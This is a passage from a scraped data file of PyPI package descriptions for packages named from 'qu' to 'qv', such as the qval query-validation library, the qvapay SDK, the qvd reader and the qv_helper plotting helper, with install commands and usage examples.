ee4\u683c\u5f0f\uff1aOpenQASM 2.0\u6807\u51c6\u548cQuSL\u6c47\u7f16\u6807\u51c6\u3002\u652f\u6301\u91cf\u5b50\u53ef\u89c6\u5316\u7f16\u7a0b\uff08\u9700\u8981\u914d\u5408\u542f\u79d1\u91cf\u5b50\u7814\u53d1\u7684\u91cf\u5b50\u96c6\u6210\u5f00\u53d1\u73af\u5883 QuBranch\uff09\u3002\u4e0b\u8f7d\u548c\u5b89\u88c5pip\u5b89\u88c5QuTrunk \u5df2\u53d1\u5e03\u4e8e PyPI \u5b98\u7f51\uff0c\u53ef\u4ee5\u901a\u8fc7 pip \u547d\u4ee4\u8fdb\u884c\u5b89\u88c5\u3002\n\u6ce8\u610f\u5728\u6b63\u5f0f\u4f7f\u7528 QuTurnk \u4e4b\u524d\uff0c\u60a8\u9700\u8981\u5148\u5b89\u88c5 Python\uff08\u7248\u672c 3.8+\uff09\u3002pipinstallqutrunk# \u53ef\u9009\u5b89\u88c5\uff1abraket\u2014\u2014\u652f\u6301AWS Braket\u4f5c\u4e3a\u91cf\u5b50\u8ba1\u7b97\u540e\u7aefpipinstall'qutrunk[braket]'# \u53ef\u9009\u5b89\u88c5\uff1aparallel\u2014\u2014\u652f\u6301\u591a\u8282\u70b9\u5e76\u884c\u8ba1\u7b97pipinstall'qutrunk[parallel]'# \u53ef\u9009\u5b89\u88c5\uff1agpu\u2014\u2014\u652f\u6301gpu\u8ba1\u7b97\u52a0\u901f(\u76ee\u524d\u652f\u6301\u5230\uff1acuda 11)pipinstall'qutrunk[gpu]'\u9a8c\u8bc1QuTrunk\u662f\u5426\u5b89\u88c5\u6210\u529f\uff0c\u6253\u5f00\u7ec8\u7aef\u8fdb\u5165python\u4ea4\u4e92\u6a21\u5f0f\uff0c\u6267\u884c\u5982\u4e0b\u8bed\u53e5\uff1aimportqutrunkqutrunk.run_check()\u8f93\u51fa\u7ed3\u679c\u4e3a\uff1a\"QuTrunk is installed successfully! You can use QuTrunk now.\"\u8868\u660eQuTrunk\u5b89\u88c5\u6210\u529f\u3002\u793a\u4f8b\u4ee3\u7801\u4ee5\u4e0b\u793a\u4f8b\u5c55\u793a\u4e86\u5229\u7528 QuTrunk \u8fd0\u884c bell-pair \u91cf\u5b50\u7b97\u6cd5\uff1a# import packagefromqutrunk.circuitimportQCircuitfromqutrunk.circuit.gatesimportH,CNOT,Measure,All# allocate resourceqc=QCircuit()qr=qc.allocate(2)# apply quantum gatesH*qr[0]CNOT*(qr[0],qr[1])All(Measure)*qr# print circuitqc.print()# run circuitres=qc.run(shots=1024)# print resultprint(res.get_counts())# draw circuitqc.draw()\u8fd0\u884c\u7ed3\u679c\uff1a\u91cf\u5b50\u53ef\u89c6\u5316\u7f16\u7a0bQuBranch\u662f\u7531\u542f\u79d1\u91cf\u5b50\u57fa\u4e8evscode\u5f00\u53d1\u7684\u91cf\u5b50\u7f16\u7a0b\u96c6\u6210\u5f00\u53d1\u73af\u5883, QuTrunk\u4e0eQuBranch\u76f8\u4e92\u914d\u5408\u53ef\u4ee5\u5b9e\u73b0\u91cf\u5b50\u53ef\u89c6\u5316\u7f16\u7a0b,\n\u5177\u4f53\u6b65\u9aa4\u53c2\u89c1\u91cf\u5b50\u53ef\u89c6\u5316\u7f16\u7a0b\u6587\u6863QuTrunk \u5feb\u901f\u4e0a\u624b\u6559\u7a0bQuTrunk API\u5982\u4f55\u53c2\u4e0e\u5f00\u53d1\u9605\u8bfb\u6e90\u4ee3\u7801\uff0c\u4e86\u89e3\u6211\u4eec\u5f53\u524d\u7684\u5f00\u53d1\u65b9\u5411\u627e\u5230\u81ea\u5df1\u611f\u5174\u8da3\u7684\u529f\u80fd\u6216\u6a21\u5757\u8fdb\u884c\u5f00\u53d1\uff0c\u5f00\u53d1\u5b8c\u6210\u540e\u81ea\u6d4b\u529f\u80fd\u662f\u5426\u6b63\u786eFork\u4ee3\u7801\u5e93\uff0c\u5c06\u4fee\u590d\u4ee3\u7801\u63d0\u4ea4\u5230fork\u7684\u4ee3\u7801\u5e93\u53d1\u8d77pull request\u66f4\u591a\u8be6\u60c5\u8bf7\u53c2\u89c1\u94fe\u63a5\u8bb8\u53ef\u8bc1QuTrunk\u662f\u81ea\u7531\u548c\u5f00\u6e90\u7684\uff0c\u5728Apache 2.0\u8bb8\u53ef\u8bc1\u7248\u672c\u4e0b\u53d1\u5e03\u3002"} +{"package": "quuz", "pacakge-description": "No description available on PyPI."} +{"package": "quwiki", "pacakge-description": "No description available on PyPI."} +{"package": "quxidget", "pacakge-description": "No description available on PyPI."} +{"package": "quxr", "pacakge-description": "QUXRThis package contains common methods used in Quantitative UX Research."} +{"package": "quyckplot", "pacakge-description": "A package that helps the process of loading multiple files and plotting the data inside."} +{"package": "quy_nestery", "pacakge-description": "No description available on PyPI."} +{"package": "quyuan", "pacakge-description": "quyuanquyuanis a folk oftagorewith several modifications to make it more suitable for my own use.Installationquyuanis a simple Python script with several dependencies.$pipinstallgit+https://github.com/tcztzy/quyuan.git$quyuan--versionquyuan, version 1.1.2RequirementsPython 3.6+CairoSVGClickColoramaQuick startThe demo data consists ofCatalogue of Somatic Mutations in Cancer (COSMIC) Cancer Gene Censusgenes and 100 randomly simulated mutations. Points represent single nucleotide variants (i.e. variant present in <3 samples); triangles represent single nucleotide polymorphisms (i.e. variants found in many samples); and short lines (single chromosome) represent known INDEL sites.$quyuan--inputexample_ideogram/test.bed--prefixexample_ideogram/example-vfUsageUsage: quyuan [OPTIONS]\n\n quyuan: a utility for illustrating human chromosomes\n https://github.com/tcztzy/quyuan\n\nOptions:\n --version Show the version and exit.\n -i, --input Input BED-like file [required]\n -p, --prefix [output file prefix]\n Output prefix [Default: \"out\"]\n -b, --build [hg37|hg38|irgsp1] Human genome build to use [Default: hg38]\n -f, --force Overwrite output files if they exist already\n -ofmt, --oformat [png|pdf|ps|svg]\n Output format for conversion\n -v, --verbose Display verbose output\n --help Show this message and exit.The input file is a bed-like format, described below. If an output prefix is not specified, the scripts uses \"out\" as the default prefix.Helper scripts for converting RFMix and ADMIXTURE outputs are included in thescripts/folder.A more complete example of a full chromosome painting using an RFMix output can be seen by running:rfmix2tagore--chr1example_ideogram/1KGP-MXL104_chr1.bed\\--chr2example_ideogram/1KGP-MXL104_chr2.bed\\--outexample_ideogram/1KGP-MXL104_tagore.bed\n\nquyuan--inputexample_ideogram/1KGP-MXL104_tagore.bed\\--prefixexample_ideogram/1KGP-MXL104\\--buildhg37\\--verboseInput file description#chr\tstart\tstop\tfeature\tsize\tcolor\tchrCopy\nchr1\t10000000\t20000000\t0\t1\t#FF0000\t1\nchr2\t20000000\t30000000\t0\t1\t#FF0000\t2\nchr2\t40000000\t50000000\t0\t0.5\t#FF0000\t1Each column is explained below:chr- The chromosome on which a feature has to be drawnstart- Start position (in bp) for featurestop- Stop position (in bp) for featurefeature- The shape of the feature to be drawn0 will draw a rectangle1 will draw a circle2 will draw a triangle pointing to the genomic location3 will draw a line at that genomic locationsize- The horizontal size of the feature. Should range between 0 and 1.color- Specify the color of the genomic feature with a hex value (#FF0000 for red, etc.)chrCopy- Specify the chromosome copy on which the feature should be drawn (1 or 2). To draw the same feature on both chromosomes, you must specify the feature twiceEtymologyQu Yuan(\u5c48\u539f) was a Chinese patriot poet and politician living in c.340BC - 278BC."} +{"package": "qval", "pacakge-description": "Qval | Query params validation libraryInstallationBasic usageFramework-specific instructionsDjango Rest FrameworkPlain DjangoFlaskFalconDocsConfigurationLoggingAboutQval is a query parameters validation library designed to be used in small projects that require a lot of repetitive\nparameter validation. In contrast with DRF'sValidators(and other serialization abstractions), Qval requires almost no boilerplate.Installation$pipinstallqvalBasic UsageYou can use Qval both as a function and a decorator. The functionvalidate()accepts 3 positional arguments and 1 named:# qval.pydefvalidate(request:Union[Request,Dict[str,str]],# Request instance. Must implement the request interface or be a dictionaryvalidators:Dict[str,Validator]=None,# A Dictionary in the form of (param_name -> `Validator()` object)box_all:bool=True,# If True, adds all query parameters to the params object**factories:Optional[Callable[[str],object]],# Factories for mapping `str` params to Python objects.)->QueryParamValidator:A Use CaseLet's say that you are developing a RESTful calculator that has an endpoint called/api/divide. You can usevalidate()to automatically convert the parameters to python objects and then validate them:fromqvalimportvalidate...defdivision_view(request):\"\"\"GET /api/divide?param a : intparam b : int, nonzeroparam token : string, length = 12Example: GET /api/divide?a=10&b=2&token=abcdefghijkl -> 200, {\"answer\": 5}\"\"\"# Parameter validation occurs in the context manager.# If validation fails or user code throws an error, the context manager# will raise InvalidQueryParamException or APIException respectively.# In Django Rest Framework, these exceptions will be processed and result# in the error codes 400 and 500 on the client side.params=(# `a` and `b` must be integers.# Note: in order to get a nice error message on the client side,# you factory should raise either ValueError or TypeErrorvalidate(request,a=int,b=int)# `b` must be anything but zero.nonzero(\"b\")# The `transform` callable will be applied to the parameter before the check.# In this case we'll get `token`'s length and check if it is equal to 12..eq(\"token\",12,transform=len))# validation starts herewithparamsasp:returnResponse({\"answer\":p.a//p.b})// GET /api/divide?a=10&b=2&token=abcdefghijkl// Browser:{\"answer\":5}Sending b = 0 to this endpoint will result in the following message on the client side:// GET /api/divide?a=10&b=0&token=abcdefghijkl{\"error\":\"Invalid `b` value: 0.\"}If you have many parameters and custom validators, it's better to use the@qval()decorator:# validators.pyfromdecimalimportDecimalfromqvalimportValidator,QvalValidationError...defprice_validator(price:int)->bool:\"\"\"A predicate to validate `price` query parameter.Provides custom error message.\"\"\"ifprice<=0:# If price does not match our requirements, we raise QvalValidationError() with a custom message.# This exception will be handled in the context manager and will be reraised# as InvalidQueryParamException() [HTTP 400].raiseQvalValidationError(f\"Price must be greater than zero, got\\'{price}\\'.\")returnTruepurchase_factories={\"price\":Decimal,\"item_id\":int,\"token\":None}purchase_validators={\"token\":Validator(lambdax:len(x)==12),# Validator(p) can be omitted if there is only one predicate:\"item_id\":lambdax:x>=0,\"price\":price_validator,}# views.pyfromqvalimportqvalfromvalidatorsimport*...# Any function or method wrapped with `qval()` must accept `request` as# either first or second argument, and `params` as last.@qval(purchase_factories,purchase_validators)defpurchase_view(request,params):\"\"\"GET /api/purchase?param item_id : int, positiveparam price : float, greater than zeroparam token : string, len == 12Example: GET /api/purchase?item_id=1&price=5.8&token=abcdefghijkl\"\"\"print(f\"{params.item_id}costs{params.price}$.\")...Framework-specific InstructionsDjango Rest Framework works straight out of the box. Simply add@qval()to your views or usevalidate()inside.For DjangowithoutDRF you may need to add the exception handler tosettings.MIDDLEWARE. Qval attempts to\ndo it automatically ifDJANO_SETTINGS_MODULEis set. Otherwise you'll see the following message:WARNING:root:UnabletoaddtheAPIExceptionmiddlewaretotheMIDDLEWARElist.Djangodoesnot\nsupportAPIExceptionhandlingwithoutDRFintegration.DefineDJANGO_SETTINGS_MODULEor\nadd'qval.framework_integration.HandleAPIExceptionDjango'totheMIDDLEWARElist.Take a look at the plain Django examplehere.If you are using Flask, you will need to setup the exception handlers:fromflaskimportFlaskfromqval.framework_integrationimportsetup_flask_error_handlers...app=Flask(__name__)setup_flask_error_handlers(app)Sincerequestin Flask is a global object, you may want to curry@qval()before usage:fromflaskimportrequestfromqvalimportqval_curry# Firstly, curry `qval()`qval=qval_curry(request)...# Then use it as a decorator.# Note: you view now must accept `request` as its first argument@app.route(...)@qval(...)defview(request,params):...Check out the full Flaskexampleinexamples/flask-example.py.You can run the example using the command below:$ PYTHONPATH=. FLASK_APP=examples/flask-example.py flask runSimilarly to Flask, with Falcon you will need to setup the error handlers:importfalconfromqval.framework_integrationimportsetup_falcon_error_handlers...app=falcon.API()setup_falcon_error_handlers(app)Full Falconexamplecan be found here:examples/falcon-example.py.Use the following command to run the app:$ PYTHONPATH=. python examples/falcon-example.pyDocsRefer to thedocumentationfor more verbose descriptions and auto-generated API docs.\nYou can also look at theteststo get a better idea of how the library works.ConfigurationQval supports configuration via python config files and environmental variables.\nIfDJANGO_SETTINGS_MODULEorSETTINGS_MODULEis defined, the specified config module will be used. Otherwise,\nall lookups will be done inos.environ.Supported variables:QVAL_MAKE_REQUEST_WRAPPER = myapp.myfile.my_func. Customizes the behaviour of themake_request()function,\nwhich is applied to all incoming requests. The result of this function is then passed toqval.qval.QueryParamValidator.\nThe provided function must acceptrequestand return an object that supports the request interface\n(seeqval.framework_integration.DummyReqiest).For example, the following code adds logging to eachmake_request()call:# app/utils.pydefmy_wrapper(f):@functools.wraps(f)defwrapper(request):print(f\"Received a new request:{request}\")returnf(request)returnwrapperYou will also need to set the environment variableexport QVAL_MAKE_REQUEST_WRAPPER=app.utils.my_wrapperin your terminal or add it to the used config file.QVAL_REQUEST_CLASS = path.to.CustomRequestClass.@qval()will use it to determine whether the first or second argument is the request.\nIf you have a custom request class that implements theqval.framework_integration.DummyRequestinterface, provide it using this variable.LoggingQval uses a global object calledlogfor reporting errors. You can disable this by callinglog.disable(). Here's an example error message:Anerroroccurredduringthevalidationorinsidethecontext:exc``((34,'Numerical result out of range')).|Parameters:|Body:b''|Exception:\nTraceback(mostrecentcalllast):File\"/qval/qval.py\",line338,ininnerreturnf(*args,params,**kwargs)File\"/examples/django-example/app/views.py\",line46,inpow_viewreturnJsonResponse({\"answer\":params.a**params.b})OverflowError:(34,'Numerical result out of range')InternalServerError:/api/pow[19/Nov/201807:03:15]\"GET /api/pow?a=2.2324&b=30000000 HTTP/1.1\"500102Disable the logging with the following code:fromqvalimportloglog.disable()"} +{"package": "qvalidate", "pacakge-description": "A package to find area of different figures"} +{"package": "qvalidate2", "pacakge-description": "A package to find area of different figures"} +{"package": "qvalidation", "pacakge-description": "No description available on PyPI."} +{"package": "qvalue", "pacakge-description": "No description available on PyPI."} +{"package": "qvalve", "pacakge-description": "qvalve - Query Valve Main and Game ServersUsageqvalve [--max-threads NUM] [--debug] [--show-players] [--show-keywords]\n [--show-tags] [--report-keywords] [--max-servers NUM]\n [--regions NUM [NUM ...]] [--appid NUM] [--empty NUM]\n [--full NUM] [--noplayers NUM] [--map-name NAME]\n [--map-prefix PREFIX] [--min-players NUM] [--no-max-players]\n [--max-ping NUM] [--no-mm-strict-1] [--web-server] [-h] [-v]\n [-V] [--config FILE] [--print-config] [--print-url]\n [--completion [SHELL]]\n [ADDR ...]SearchValves Main server for Game servers. Integrated withtf2mons\nhacker-database to identify known cheaters on game servers. Click on a\nserver to show/hide its players;Ctrl-Clickon server (or players) to\nsubsequently connect to that server whenF12is pressed in-game.Options--max-threads NUM Run `NUM` threads for game server comms (default:\n `10`).\n--debug Pretty-print raw response records (default: `False`).\n--show-players Print `A2S_PLAYER.names` (default: `False`).\n--show-keywords Print `A2S_INFO.keywords` (default: `False`).\n--show-tags Print `A2S_RULES.sv_tags` (default: `False`).\n--report-keywords Print keywords report (default: `False`).Stage one filters, sent to valve in query to get list of remote game servers--max-servers NUM Get no more than `NUM` servers per region (default:\n `100`).\n--regions NUM [NUM ...]\n Get servers for list of regions (default: `[0, 1, 2,\n 3]`).\n--appid NUM Servers that are running game (default: `440`).\n--empty NUM Servers that are not empty.\n--full NUM Servers that are not full.\n--noplayers NUM Servers that are empty.\n--map-name NAME Match map `NAME` (exact).\n--map-prefix PREFIX\n Match map names that start with `PREFIX`.Stage two filters, applied after querying valve--min-players NUM Where number of players is at least NUM.\n--no-max-players Where number of players is less than its\n `max_players`.\n--max-ping NUM Where ping is NUM or less.\n--no-mm-strict-1 Where tf_mm_strict is not 1.Usage 2ADDR Query list of Game server addresses, where ADDR is\n `IP:PORTNO`.Usage 3--web-server Run web server.General options-h, --help Show this help message and exit.\n-v, --verbose `-v` for detailed output and `-vv` for more detailed.\n-V, --version Print version number and exit.\n--config FILE Use config `FILE` (default: `~/.qvalve.toml`).\n--print-config Print effective config and exit.\n--print-url Print project url and exit.\n--completion [SHELL]\n Print completion scripts for `SHELL` and exit\n (default: `bash`)."} +{"package": "qvantum", "pacakge-description": "1. Summaryqvantum is a python module, and it's goal is to ensure an easy use library for understanding quantum computing better or designing new quantum algorithms. Working with this module helps you to get more familiar with the basic concepts such as qubit, register or quantum gate, meanwhile the tool has the power for deeper analysis and development.The module is in beta release phase: tested but it might contain bugs, therefore every constructive note is highly appreciated. Also if you would like to collaborate in the developing process do not hesitate to contact us.2. Installationqvantum module can be easily installed using three different approach below (you could extend the commands below like \"/path/to/python.exe -m pip install ...\", if python wasn't in your PATH)2.1 pip installThe latest version of the module can be installed online from the PyPi page using pip in command line:pip install qvantumorpip install --index-url https://test.pypi.org/simple qvantum2.2 wheel installThe latest version of the module can be downloaded from the PyPi page in .whl format which can be used for installation:pip install qvantum-x.xx-py2.py3-none-any.whl2.3 setup fileA setup.py file is also available on PyPi page. Download the file and the folder called \"qvantum\" then run the command in the folder where all the files were downloaded. Use \u00e2\u20ac\u201ce if you want the module be immediately available for every user in your system:pip install .orpip install \u00e2\u20ac\u201ce .3. DocumentationGitHub - qvantum"} +{"package": "qvapay", "pacakge-description": "Python SDK for the QvaPay APINon official, but friendly QvaPay library for the Python language.SetupYou can install this package by using the pip tool and installing:pipinstallqvapayOreasy_installqvapaySign up onQvaPayCreate your account to process payments throughQvaPayatqvapay.com/register.Using the clientFirst, import theAsyncQvaPayClient(orSyncQvaPayClient) class and create yourQvaPayasynchronous (or synchronous) client using your app credentials.fromqvapay.v1importAsyncQvaPayClientclient=AsyncQvaPayClient(app_id,app_secret)It is also possible to use theQvaPayAuthclass (which by default obtains its properties from environment variables or from the content of the.envfile) and the static methodAsyncQvaPayClient.from_auth(orSyncQvaPayClient.from_auth) to initialize the client.fromqvapay.v1importAsyncQvaPayClient,QvaPayAuthclient=AsyncQvaPayClient.from_auth(QvaPayAuth())Use context managerThe recommended way to use a client is as a context manager. For example:asyncwithAsyncQvaPayClient(...)asclient:# Do anything you want...orwithSyncQvaPayClient(...)asclient:# Do anything you want...Get your app info# Use await when using AsyncQvaPayClient# With SyncQvaPayClient it is not necessary.info=awaitclient.get_info()Get your account balance# Use await when using AsyncQvaPayClient# With SyncQvaPayClient it is not necessary.balance=awaitclient.get_balance()Create an invoice# Use await when using AsyncQvaPayClient# With SyncQvaPayClient it is not necessary.transaction=awaitclient.create_invoice(amount=10,description='Ebook',remote_id='EE-BOOk-123'# example remote invoice id)Get transaction# Use await when using AsyncQvaPayClient# With SyncQvaPayClient it is not necessary.transaction=awaitclient.get_transaction(id)Get transactions# Use await when using AsyncQvaPayClient# With SyncQvaPayClient it is not necessary.transactions=awaitclient.get_transactions(page=1)You can also read theQvaPay APIdocumentation:qvapay.com/docs.For developersThe_syncfolders were generated automatically executing the commandunasync qvapay tests.The code that is added in the_asyncfolders is automatically transformed.So every time to make a change you must run the commandunasync qvapay teststo regenerate the folders_syncwith the synchronous version of the implementation.Improvetestsimplementation and addpre-commitsystem to ensure format and style.Migration guide0.2.0 -> 0.3.0QvaPayClientwas divided into two classes:AsyncQvaPayClientandSyncQvaPayClient. Both classes have the same methods and properties, with the difference that the methods inAsyncQvaPayClientare asynchronous and inSyncQvaPayClientare synchronous.0.1.0 -> 0.2.0user_idofTransactionmodel was removedpaid_by_user_idofTransactionmodel was removed0.0.3 -> 0.1.0from qvapay.v1 import *instead offrom qvapay import *QvaPayClientinstead ofClientclient.get_infoinstead ofclient.infoclient.get_balanceinstead ofclient.balanceclient.get_transactionsinstead ofclient.transactionsContributors \u2728Thanks goes to these wonderful people (emoji key):Carlos Lugones\ud83d\udcbbOzkar L. Garcell\ud83d\udcbbLeynier Guti\u00e9rrez Gonz\u00e1lez\ud83d\udcbbJorge Alejandro Jimenez Luna\ud83d\udcbbReinier Hern\u00e1ndez\ud83d\udc1bThis project follows theall-contributorsspecification. Contributions of any kind welcome!"} +{"package": "qvatel-sms-api", "pacakge-description": "QvaTel Python LibraryEsta librer\u00eda proporciona una interfaz de Python para interactuar con la API de SMS de QvaTelFuncionesEnviar mensajes SMS.Obtener el estado de los mensajes.Consultar el balance de la cuenta.RequisitosPython 3.6 o superior.Una cuenta de QvaTel con un API token de SMS.Instalaci\u00f3nInstala la librer\u00eda usando pip:pip install qvatel-sms-apiUsoAqu\u00ed hay un ejemplo b\u00e1sico de c\u00f3mo usar la librer\u00eda para enviar un SMS, obtener el estado de un mensaje y consultar el balance de la cuenta:fromqvatel.clientimportQvaTelClient# Inicializa el cliente con tu API tokenclient=QvaTelClient('your_api_token_here')# Env\u00eda un SMSdestination='+5352942387'message='Hola mundo desde QvaTel'response=client.send_sms(destination,message)print(response)# Obtiene el estado de un mensajemessage_id='your_message_id_here'status=client.get_message_status(message_id)print(status)# Obtiene el balance de la cuentabalance=client.get_account_balance()print(balance)ContribucionesLas contribuciones son bienvenidas. Por favor, abre un issue si encuentras un bug o tienes una solicitud de funci\u00f3n."} +{"package": "qvd", "pacakge-description": "Read Qlik Sense .qvd files \ud83d\udee0A python library for reading Qlik Sense .qvd file format, written in Rust.\nFiles can be read to DataFrame or dictionary.InstallInstall from PyPihttps://pypi.org/project/qvd/pipinstallqvdUsagefromqvdimportqvd_readerdf=qvd_reader.read('test.qvd')print(df)DevelopingCreate a virtual envhttps://docs.python-guide.org/dev/virtualenvs/and activate it.python3-mvenvvenvThen install dev dependencies:pipinstallpandasmaturinAfterwards, runmaturindevelop--releaseto install the generated python lib to the virtual env.TestTo run the tests, you can use these commands:cargotest# runs all Rust unit testspytesttest_qvd_reader.py# runs all Python testsQVD File StructureA QVD file is split into 3 parts; XML Metdata, Symbols table and the bit\nstuffed binary indexes.XML MetadataThis section is at the top of the file and is in human readable XML. This\nsection contains metadata about the file in gneneral such as table name, number\nof records, size of records as well as data about individual fields including\nfield name, length offset in symbol table.Symbol tableDirectly after the xml section is the symbol table. This is a table of every\nunique value contained within each column. The columns are in the order\ndescribed in the metadata fields section. In the metadata we can find the byte\noffset from the start of the symbols section for each column. Symbol types\ncannot be determined from the metadata and are instead determined by a flag\nbyte preceding each symbol. These types are:1 - 4 byte signed int (u32) - little endiand2 - 8 byte signed float (f64) - little endian4 - null terminated string5 - 4 bytes of junk follwed by a null terminated string representing an integer6 - 8 bytes of junk followed by a null terminated string representing a floatBinary IndexesAfter the symbol table are the binary indexes that map to the symbols for each\nrow. They are bit stuffed and reversed binary numbers that point to the index\nof the symbol in the symbols table for each field."} +{"package": "qv-helper", "pacakge-description": "Quick Visualization HelperTHE helper package for Quick Visualization that you needqv_helperis a newly designed package to faciliate data visualization. As researchers or analysts, we often need to perform preliminary visualizations before analysis. While the plots may show some seemingly promosing effects, a statistical test may reveal the other wise.Sometimes, we will want to look at both the plots and the statistical tests results. Currently, there is no single package or function that performs both visualization and tests simutaneously. Having statistical tests results automatically generated can facilitate the pipeline of exploratory data analysis (EDA) while helping researchers to quickly grap a better sense of the data with statistics as supplements to plots. This is why I wanto to buildqv_helper. Withqv_helper, visualizations and statistical tests are no longer separated by parallel processes, achieving by just 1 line of code.While the package is specially designed for EDA, it is more recommended to be used in notebook documents instead of in the terminal.UsageInstallationInstallation is easy as the package is published in PyPI.$pipinstallqv_helperqv_groupsTo illustrate the functionalities, thePalmer penguins datasetwill be used.qv_groupstake 1 numeric variable and 1 categorical variable to build a histogram for the numeric variable and a boxplot of the numeric variable grouped by the categorical variable. When there are more than 2 classes in the grouping variable, a one-way ANOVA test will be performed.frompalmerpenguinsimportload_penguinsdf=load_penguins()fromqv_helper.qv_helperimportqv_groupsqv_groups(value='bill_length_mm',group='species',data=df,title='Bill Length in Different Species',xlabel='Bill length (mm)',ylabel='Species')Null values are dropped in statistical tests.\nTest F p\n------------- ------ ------\nOne-way ANOVA 397.30 0.0000When there are only 2 groups, t-tests will be performed automatically.qv_groups(value='bill_length_mm',group='sex',data=df,title='Bill Length in 2 Sex',xlabel='Bill length (mm)',ylabel='Sex')Null values are dropped in statistical tests.\nTest t p\n---------------------- ---- ------\nEqual var. assumed 0.00 1.0000\nEqual var. not assumed 0.00 1.0000qv_scatterqv_scattertakes 2 numeric values as arguments and plot the corresponding scatter plot. 2 correlation statistics will be printed based on the needs of users.qv_scatter(valuex='bill_length_mm',valuey='bill_depth_mm',data=df,title='Relationship between Bill Length and Bill Depth',xlabel='Bill Length (mm)',ylabel='Bill Depth (mm)')Null values are dropped in statistical tests.\nTest r p\n------------ ------- ------\nPearson's r -0.2286 0.0000\nSpearman's r -0.2139 0.0001qv_2catqv_2cattakes 2 categorical variables as arguments and plot the corresponding heatmap and a stacked barchart for to illustrate the proportion of each class ingroupxingroupy. When both of the categorical variables are with exactly 2 classes, Barnard's exact test and Fisher's exact test will also be performed.qv_2cat(groupx='species',groupy='island',data=df,title_heatmap='Count of each Species on each Island',title_bar='Proportion of each Species on each Island',xlabel='Species',ylabel='Island')Test Test statistic Value df p\n---------------- ---------------- ------- ---- ------\nChi-squared test Chi-squared 299.55 4 0.0000qv_countqv_counttakes 1 categorical variable as argument and plot a barchart. The count in numeric values will also be printed and supplemented by the the number of null values.qv_count(value='species',data=df,title='Count of each Species',label='Species')Group Count\n--------- -------\nAdelie 152\nGentoo 124\nChinstrap 68\nNA 0qv_distqv_disttakes 1 numeric variable as argument and plot a histogram. Summary statistics will be printed as well.qv_dist(value='bill_length_mm',data=df,title='Distribution of Bill Length',label='Bill Length (mm)')Null values are dropped in the chart and statistics.\nStatistics Value\n------------ -------\nMean 43.99\nVariance 29.82\nSample size 333.00\n# of NAs 0.00\nSkewness 0.05ContributingInterested in contributing? Check out the contributing guidelines. Please note that this project is released with a Code of Conduct. By contributing to this project, you agree to abide by its terms.Licenseqv_helperwas created by Morris Chan. It is licensed under the terms of the MIT license.Creditsqv_helperwas created withcookiecutterand thepy-pkgs-cookiecuttertemplate.Special thanks go to @MNBhat, @Lorraine97, @austin-shih, who finished an academic project inprelim_eda_helperwith me.Quick Visualizaiont Helperis inspired byprelim_eda_helper. The development of the current project is agreed by all authors ofprelim_eda_helper."} +{"package": "qvibe-recorder", "pacakge-description": "qvibe-recorderAn vibration measurement app for the RPI.Install from pypi as$ pip install qvibe-recorderDesigned to be used withqvibe-analyser"} +{"package": "qview", "pacakge-description": "The \"qview\" Python package is a powerful Visualization and Monitoring\nfacility, which allows embedded developers to create virtual Graphical\nUser Interfaces in Python to monitor and control their embedded devices\nfrom a host (desktop) computer. The interfaces created by QView can\nvisualize the data produced byQP/Spy software tracing systemand can also interact with the embedded target by sending various commands.General RequirementsThe \"qview\" package requires Python 3 with thetkinterpackage, which\nis included in theQTools distributionfor Windows and is typically included with other operating systems, such as\nLinux and MacOS.To run \"qview\" in Python, you need to first launch theQSPY console applicationto communicate with the chosen embedded target (or the host executable\nif you are simulating your embedded target).Once QSPY is running, from a separate terminal you can launchqview.pyand \"attach\" to theQSPY UDP socket.\nAfter this communication has been established, \"qview\" can interact with the\ninstrumented target and receive data from it (through QSPY).NOTEThe embedded C or C++ code running inside the target needs to be\nbuilt with theQP/Spy software tracing systeminstrumentation enabled. This is acheived by building the \"Spy\" build configuration.InstallationTheqview.pyscript can be used standalone,withoutany\ninstallation (see Using \"qview\" below).Alternatively, you caninstallqview.pywithpipfrom PyPi by\nexecuting the following command:pip install qviewOr directly from the sources directory (e.g.,/qp/qtools/qview):python setup.py install --install-dir=/qp/qtools/qviewUsing \"qview\"If you are usingqviewas a standalone Python script, you invoke\nit as follows:python /path-to-qview-script/qview.py [ [ []]]Alternatively, if you've installedqviewwithpip, you invoke\nit as follows:qview [cust_script] [qspy_host[:udp_port]] [local_port]Command-line Optionscust_script- optional customization Python scripts for your specific\ntarget sytem. If not specified, qview will provide only the generic facilities\nfor interacting with the target (e.g., reset, setting QS filters,\nposting events, etc.)qspy_host[:udp_port]- optional host-name/IP-address:port for the host\nrunning the QSPY host utility. If not specified, the default\nis 'localhost:7701'.local_port- optional the local UDP port to be used by \"qview\". If not\nspecified, the default is '0', which means that the operating sytem will\nchoose an open port.Examples (for Windows):python %QTOOLS%\\qview\\qview.pyopens the generic (not customized) \"qview\".python %QTOOLS%\\qview\\qview.py dpp.pyopens \"qview\" with the customization provided in thedpp.pyscript\nlocated in the current directory.qview ..\\qview\\dpp.py localhost:7701opens \"qview\" (installed withpip) with the customization provided in thedpp.pyscript located in the directory..\\qview. The \"qview\" will\nattach to the QSPY utility running atlocalhost:7701.qview dpp.py 192.168.1.100:7705opens \"qview\" (installed withpip) with the customization provided in thedpp.pyscript located in the current directory. The \"qview\" will attach to\nthe QSPY utility running remotely at IP address192.168.1.100:7705.Examples (for Linux/macOS):python $(QTOOLS)/qview/qview.pyopens the generic (not customized) \"qview\".python $(QTOOLS)/qview/qview.py dpp.pyopens \"qview\" with the customization provided in thedpp.pyscript\nlocated in the current directory.qview *.py ../qview/dpp.py localhost:7701opens \"qview\" (installed withpip) with the customization provided in thedpp.pyscript located in the directory../qview. The \"qview\" will\nattach to the QSPY utility running atlocalhost:7701.qview dpp.py 192.168.1.100:7705opens \"qview\" (installed withpip) with the customization provided in thedpp.pyscript located in the current directory. The \"qview\" will attach to\nthe QSPY utility running remotely at IP address192.168.1.100:7705.More InformationMore information about the QView Visualization and Monitoring is available\nonline at:https://www.state-machine.com/qtools/qview.htmlMore information about the QP/QSPY software tracing system is available\nonline at:https://www.state-machine.com/qtools/qpspy.html"} +{"package": "qvikconfig", "pacakge-description": "qvikconfig is a parser of a simple config file syntax called the\nqvikconfig format. The basic syntax is \u2018property = value\u2019. qvikconfig\nworks with both Python 2.6+ and Python 3.x.Licenseqvikconfig is free software under the terms of the GNU General Public\nLicense version 3 (or any later version). The author of qvikconfig is\nNiels Serup, contactable atns@metanohi.org. This is version 0.1.1 of\nthe program.InstallingIf you have python-setuptools installed, you can just do this:$ sudo easy_install qvikconfigAlternatively, download and extract the gzipped tarball found on this\nvery page, and then run this:$ sudo python setup.py installThe newest version ofqvikconfigis always available athttp://metanohi.org/projects/qvikconfig/and at the Python\nPackage Index.UsingThis module has two 